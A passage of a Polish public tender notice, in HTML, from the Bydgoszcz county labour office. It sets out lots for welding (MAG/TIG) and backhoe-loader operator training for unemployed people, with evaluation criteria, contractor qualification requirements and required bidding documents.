przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w wysokości nie więcej niż 50 % zamówienia podstawowego, tzn. możliwość przeprowadzenia dodatkowo 1 szkolenia dla maksymalnie 10 uczestników, na warunkach wskazanych w opisie przedmiotu zamówienia i przy zachowaniu niezmienionego kosztu szkolenia za jednego uczestnika zgodnie z ofertą wybranego wykonawcy. Udzielenie zamówienia nastąpi poprzez zawarcie odrębnej umowy.Czas trwania jednego szkolenia nie może przekroczyć 5 dni na realizację zajęć objętych programem oraz 4 tygodni od zakończenia szkolenia na przeprowadzenie egzaminu zewnętrznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wg kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kadry dydaktycznej (trenera/instruktora/wykładowcy) w prowadzeniu szkolenia uprawnienia elektryczne – grupa I</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa przeprowadzenia dwóch szkoleń grupowych dla osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Bydgoszczy pn. „Spawanie blach i rur spoinami pachwinowymi metodą MAG i TIG”. Liczba uczestników wszystkich szkoleń (całego zamówienia) – do 20 uczestników. Liczba uczestników jednego szkolenia wynosi do 10 uczestników. Szkolenia przeznaczone są dla osób aktywizowanych przez Powiatowy Urząd Pracy w Bydgoszczy. Program szkolenia obejmuje 232 godziny zegarowe przeprowadzone w 29 dni. Zamawiający wymaga przeprowadzenia zajęć praktycznych w wymiarze co najmniej 200 godzin zegarowych. Prognozowane miesiące rozpoczęcia szkoleń w 2023 r.: wrzesień (I szkolenie), październik (II szkolenie). Zamawiający zastrzega sobie prawo zmiany prognozowanego terminu rozpoczęcia szkoleń o maksymalnie 1 miesiąc w przypadku trudności ze skompletowaniem grupy osób bezrobotnych i poszukujących pracy, będących odbiorcami przedmiotu zamówienia. Szczegółowe terminy realizacji szkoleń zostaną ustalone z wykonawcą po wyborze najkorzystniejszej oferty, a przed zawarciem umowy w sprawie zamówienia publicznego. Czas trwania jednego szkolenia nie może przekroczyć 29 dni. Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1c do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega zastosowanie prawa opcji. Przewidywana liczba uczestników jednego szkolenia wynosi 10 osób. W przypadku gdy z powodu braku chętnych osób bezrobotnych i poszukujących pracy (sytuacja niezawiniona po stronie zamawiającego) nie uda się skompletować grupy 10 uczestników, szkolenie będzie zrealizowane (przy zachowaniu niezmienionego kosztu szkolenia za jednego uczestnika), a wykonawca otrzyma zapłatę za liczbę uczestników, która zostanie skierowana na szkolenie i wskazana w suplemencie, stanowiącym załącznik nr 2 do umowy w sprawie zamówienia publicznego. Zastrzega się jednocześnie, że jeżeli ze względu na brak chętnych osób bezrobotnych i poszukujących pracy nie uda się skompletować grupy uczestników szkolenia wynoszącej co najmniej 5 osób, wykonawcy przysługuje prawo odstąpienia od umowy. Wykonawcy nie będzie przysługiwało żadne roszczenie z tego tytułu w stosunku do zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w wysokości nie więcej niż 50 % zamówienia podstawowego, tzn. możliwość przeprowadzenia dodatkowo 1 szkolenia dla maksymalnie 10 uczestników, na warunkach wskazanych w opisie przedmiotu zamówienia i przy zachowaniu niezmienionego kosztu szkolenia za jednego uczestnika zgodnie z ofertą wybranego wykonawcy. Udzielenie zamówienia nastąpi poprzez zawarcie odrębnej umowy. Czas trwania jednego szkolenia nie może przekroczyć 29 dni na realizację zajęć objętych programem. Egzamin zewnętrzny musi zostać przeprowadzony w ostatnim dniu szkolenia.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wg kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kadry dydaktycznej (trenera/instruktora/wykładowcy) w prowadzeniu szkolenia spawanie blach i rur spoinami pachwinowymi metodą MAG</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kadry dydaktycznej (trenera/instruktora/wykładowcy) w prowadzeniu szkolenia spawanie blach i rur spoinami pachwinowymi metodą TIG</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa przeprowadzenia dwóch szkoleń grupowych dla osób bezrobotnych i poszukujących pracy zarejestrowanych w Powiatowym Urzędzie Pracy w Bydgoszczy pn. „Operator koparkoładowarki”. Liczba uczestników wszystkich szkoleń (całego zamówienia) – do 20 uczestników. Liczba uczestników jednego szkolenia wynosi do 10 uczestników. Szkolenia przeznaczone są dla osób aktywizowanych przez Powiatowy Urząd Pracy w Bydgoszczy. Program szkolenia obejmuje 134 godziny zegarowe przeprowadzone w 17 dni. Zamawiający wymaga przeprowadzenia zajęć praktycznych w wymiarze co najmniej 82 godzin zegarowych. Prognozowane miesiące rozpoczęcia szkoleń w 2023 r.: wrzesień (I szkolenie), październik (II szkolenie). Zamawiający zastrzega sobie prawo zmiany prognozowanego terminu rozpoczęcia szkoleń o maksymalnie 1 miesiąc w przypadku trudności ze skompletowaniem grupy osób bezrobotnych i poszukujących pracy, będących odbiorcami przedmiotu zamówienia. Szczegółowe terminy realizacji szkoleń zostaną ustalone z wykonawcą po wyborze najkorzystniejszej oferty, a przed zawarciem umowy w sprawie zamówienia publicznego. Czas trwania jednego szkolenia nie może przekroczyć 17 dni na realizację zajęć objętych programem oraz 4 tygodni od zakończenia szkolenia na przeprowadzenie egzaminu zewnętrznego. Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1d do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega zastosowanie prawa opcji. Przewidywana liczba uczestników jednego szkolenia wynosi 10 osób. W przypadku gdy z powodu braku chętnych osób bezrobotnych i poszukujących pracy (sytuacja niezawiniona po stronie zamawiającego) nie uda się skompletować grupy 10 uczestników, szkolenie będzie zrealizowane (przy zachowaniu niezmienionego kosztu szkolenia za jednego uczestnika), a wykonawca otrzyma zapłatę za liczbę uczestników, która zostanie skierowana na szkolenie i wskazana w suplemencie, stanowiącym załącznik nr 2 do umowy w sprawie zamówienia publicznego. Zastrzega się jednocześnie, że jeżeli ze względu na brak chętnych osób bezrobotnych i poszukujących pracy nie uda się skompletować grupy uczestników szkolenia wynoszącej co najmniej 5 osób, wykonawcy przysługuje prawo odstąpienia od umowy. Wykonawcy nie będzie przysługiwało żadne roszczenie z tego tytułu w stosunku do zamawiającego. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w wysokości nie więcej niż 50 % zamówienia podstawowego, tzn. możliwość przeprowadzenia dodatkowo 1 szkolenia dla maksymalnie 10 uczestników, na warunkach wskazanych w opisie przedmiotu zamówienia i przy zachowaniu niezmienionego kosztu szkolenia za jednego uczestnika zgodnie z ofertą wybranego wykonawcy. Udzielenie zamówienia nastąpi poprzez zawarcie odrębnej umowy. Czas trwania szkolenia nie może przekroczyć 17 dni na realizację zajęć objętych programem (96 godzin zegarowych) oraz 4 tygodni od zakończenia szkolenia na przeprowadzenie egzaminu zewnętrznego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wg kryteriów oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe kadry dydaktycznej (trenera/instruktora/wykładowcy) w prowadzeniu szkolenia operator koparkoładowarki – grupa I</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące: 1) zdolności do występowania w obrocie gospodarczym. Zamawiający nie stawia warunku w powyższym zakresie. 2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów. Wykonawca spełni warunek, jeżeli wykaże, że posiada: WYMAGANIA WSPÓLNE W ZAKRESIE CZĘŚCI NR 1, 2, 3 i 4 ZAMÓWIENIA: - wpis do rejestru instytucji szkoleniowych, prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy, zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (t.j. Dz. U. z 2023 r. poz. 735 z późn. zm.). WYMAGANIA DODATKOWE W ZAKRESIE CZĘŚCI NR 3 ZAMÓWIENIA: - atest Łukasiewicz – Górnośląskiego Instytutu Technologicznego uprawniający do szkolenia i egzaminowania spawaczy w zakresie spawania blach i rur spoinami pachwinowymi metodą MAG (135) i TIG (141) lub dokument równoważny uprawniający do szkolenia i egzaminowania spawaczy w zakresie spawania blach i rur spoinami pachwinowymi metodą MAG (135) i TIG (141). WYMAGANIA DODATKOWE W ZAKRESIE CZĘŚCI NR 4 ZAMÓWIENIA: -potwierdzenie wystawione przez Sieć Badawczą Łukasiewicz - Warszawski Instytut Technologiczny spełniania przez wykonawcę wymagań określonych w § 25 rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (t.j. Dz. U. z 2018 r. poz. 583 z późn. zm.) w zakresie przedmiotu zamówienia, tj. szkolenia operatora koparkoładowarki lub dokument równoważny wystawiony przez podmiot uprawniony przed 01 stycznia 2023 r. do wydawania potwierdzenia spełniania przez wykonawcę wymagań określonych w § 25 rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych w zakresie przedmiotu zamówienia, tj. szkolenia operatora koparkoładowarki. 3) sytuacji ekonomicznej lub finansowej. Zamawiający nie stawia warunku w powyższym zakresie. 4) zdolności technicznej lub zawodowej. Wykonawca spełni warunek, jeżeli wykaże, że dysponuje potencjałem technicznym umożliwiającym realizację zamówienia na odpowiednim poziomie jakości: WYMAGANIA WSPÓLNE W ZAKRESIE CZĘŚCI NR 1, 2, 3 i 4 ZAMÓWIENIA: - pomieszczeniami umożliwiającymi realizację zamówienia dostosowanymi do potrzeb szkolenia z uwzględnieniem bezpiecznych i higienicznych warunków realizacji szkolenia oraz o zlikwidowanych barierach architektonicznych umożliwiających osobom niepełnosprawnym udział w szkoleniu, w tym co najmniej 1 salą szkoleniową umożliwiającą realizację zajęć teoretycznych, dostosowaną do ilości osób szkolonych z odpowiednią liczbą miejsc i stolików, oświetleniem, ogrzewaniem i wentylacją. Ponadto uczestnicy szkolenia muszą mieć zapewniony dostęp do zaplecza sanitarnego. Pomieszczenia muszą być zgodne z rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (t.j. Dz. U. z 2003 r. Nr 169, poz. 1650 z późn. zm.), rozporządzeniem Ministra Edukacji Narodowej i Sportu z dnia 31 grudnia 2002 r. w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach (t.j. Dz. U. z 2020 r. poz. 1604), rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (t.j. Dz. U. z 2022 r. poz. 1225) oraz rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 7 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych obiektów budowlanych i terenów (t.j. Dz. U. z 2023 r. poz. 822); - rzutnikiem multimedialnym, flipchartem; - komputerem dla prowadzącego zajęcia (wykładowcy) posiadającym niezbędne i legalne oprogramowanie. WYMAGANIA DODATKOWE W ZAKRESIE CZĘŚCI NR 1 ZAMÓWIENIA: - pomieszczeniem(ami) lub terenem (miejscem) umożliwiającym realizację zajęć praktycznych, dostosowanym(i) do ilości osób szkolonych; - sprzętem umożliwiającym każdemu uczestnikowi realizację zajęć praktycznych oraz osiągnięcie celu szkolenia określonego przez zamawiającego w szczegółowym opisie przedmiotu zamówienia, w tym co najmniej jednym wózkiem jezdniowym podnośnikowym z mechanicznym napędem podnoszenia z wysięgnikiem. WYMAGANIA DODATKOWE W ZAKRESIE CZĘŚCI NR 2 ZAMÓWIENIA: - pomieszczeniem(ami) umożliwiającym realizację zajęć praktycznych, dostosowanym(i) do ilości osób szkolonych; - sprzętem, materiałami umożliwiającymi każdemu uczestnikowi realizację zajęć praktycznych. WYMAGANIA DODATKOWE W ZAKRESIE CZĘŚCI NR 3 ZAMÓWIENIA: - pomieszczeniami umożliwiającymi realizację szkolenia zgodnymi z rozporządzeniem Ministra Gospodarki z dnia 27 kwietnia 2000 r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz.U. z 2000 r. Nr 40 poz. 470); - spawalnią umożliwiającą realizację zajęć praktycznych dostosowaną do ilości osób szkolonych z odpowiednią liczbą stanowisk do nauki spawania, zapewniającą możliwość wykonywania wszystkich zadań podczas zajęć praktycznych; - sprzętem, materiałami umożliwiającymi każdemu uczestnikowi szkolenia realizację zajęć praktycznych. WYMAGANIA DODATKOWE W ZAKRESIE CZĘŚCI NR 4 ZAMÓWIENIA: - pomieszczeniami umożliwiającymi realizację szkolenia zgodnymi z rozporządzeniem Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (Dz. U. z 2018 r. poz. 583 z późn. zm.); - terenem (miejscem) umożliwiającym realizację zajęć praktycznych, dostosowanym do ilości osób szkolonych; - sprzętem (minimum jedną koparkoładowarką) umożliwiającym każdemu uczestnikowi szkolenia realizację zajęć praktycznych zgodnie z obowiązującymi przepisami. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">I. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych (aktualnych na dzień złożenia) w celu potwierdzenia braku podstaw do wykluczenia wykonawcy z udziału w postępowaniu: 1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275 z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 7 do SWZ; 2. Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. II. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. III. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie II, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych (aktualnych na dzień złożenia): I. Podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej obejmują: W ZAKRESIE CZĘŚCI NR 1, 2, 3 i 4 ZAMÓWIENIA: - oświadczenie o posiadaniu aktualnego na dzień złożenia wpisu do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy wskazujące numer nadany instytucji szkoleniowej w tym rejestrze - załącznik nr 5 do SWZ. W ZAKRESIE CZĘŚCI NR 3 ZAMÓWIENIA DODATKOWO: - aktualny na dzień złożenia atest Łukasiewicz – Górnośląskiego Instytutu Technologicznego uprawniający do szkolenia i egzaminowania spawaczy w zakresie spawania blach i rur spoinami pachwinowymi metodą MAG (135) i TIG (141) lub dokument równoważny uprawniający do szkolenia i egzaminowania spawaczy w zakresie spawania blach i rur spoinami pachwinowymi metodą MAG (135) i TIG (141). W ZAKRESIE CZĘŚCI NR 4 ZAMÓWIENIA DODATKOWO: - aktualne na dzień złożenia potwierdzenie wystawione przez Sieć Badawczą Łukasiewicz - Warszawski Instytut Technologiczny spełniania przez wykonawcę wymagań określonych w § 25 rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych (t.j. Dz. U. z 2018 r. poz. 583 z późn. zm.) w zakresie przedmiotu zamówienia, tj. szkolenia operatora koparkoładowarki lub dokument równoważny wystawiony przez podmiot uprawniony przed 01 stycznia 2023 r. do wydawania potwierdzenia spełniania przez wykonawcę wymagań określonych w § 25 rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych w zakresie przedmiotu zamówienia, tj. szkolenia operatora koparkoładowarki. II. Podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego posiadania zdolności technicznej lub zawodowej obejmują: - wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego na realizację usługi wraz z informacją o podstawie dysponowania tymi zasobami: - załącznik nr 6a do SWZ w zakresie Części nr 1 zamówienia, - załącznik nr 6b do SWZ w zakresie Części nr 2 zamówienia, - załącznik nr 6c do SWZ w zakresie Części nr 3 zamówienia, - załącznik nr 6d do SWZ w zakresie Części nr 4 zamówienia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Formularz ofertowy (Zamawiający wymaga złożenia przez wykonawcę oferty na wzorze zamawiającego): - załącznik nr 2a do SWZ w zakresie Części nr 1 zamówienia, - załącznik nr 2b do SWZ w zakresie Części nr 2 zamówienia, - załącznik nr 2c do SWZ w zakresie Części nr 3 zamówienia; - załącznik nr 2d do SWZ w zakresie Części nr 4 zamówienia; 2) Wykaz doświadczenia zawodowego kadry dydaktycznej (trenerów/instruktorów/wykładowców), która będzie uczestniczyła w wykonaniu zamówienia: - załącznik nr 4a do SWZ w zakresie Części nr 1 zamówienia, - załącznik nr 4b do SWZ w zakresie Części nr 2 zamówienia, - załącznik nr 4c do SWZ w zakresie Części nr 3 zamówienia; - załącznik nr 4d do SWZ w zakresie Części nr 4 zamówienia; 3) W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia – oświadczenie z którego wynika, które usługi wykonają poszczególni wykonawcy – załącznik nr 8 do SWZ; 4) W przypadku, gdy wykonawca polega na zdolnościach lub sytuacji innych podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków udziału w postępowaniu – zobowiązania podmiotu trzeciego – załącznik nr 9 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów; 5) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy (jeśli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. 2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w Rozdziale X punkt 10.1 SWZ, składa każdy z wykonawców (załącznik nr 3 do SWZ). Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. 3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy. 4. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców są oni zobowiązani na wezwanie zamawiającego złożyć podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia braku podstaw do wykluczenia wykonawcy z udziału w postępowaniu (składa każdy z nich) oraz podmiotowe środki dowodowe wymagane od wykonawcy w celu potwierdzenia spełniania warunku udziału w postępowaniu (wykonawca, który wykazuje spełnianie warunku). 5. Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, 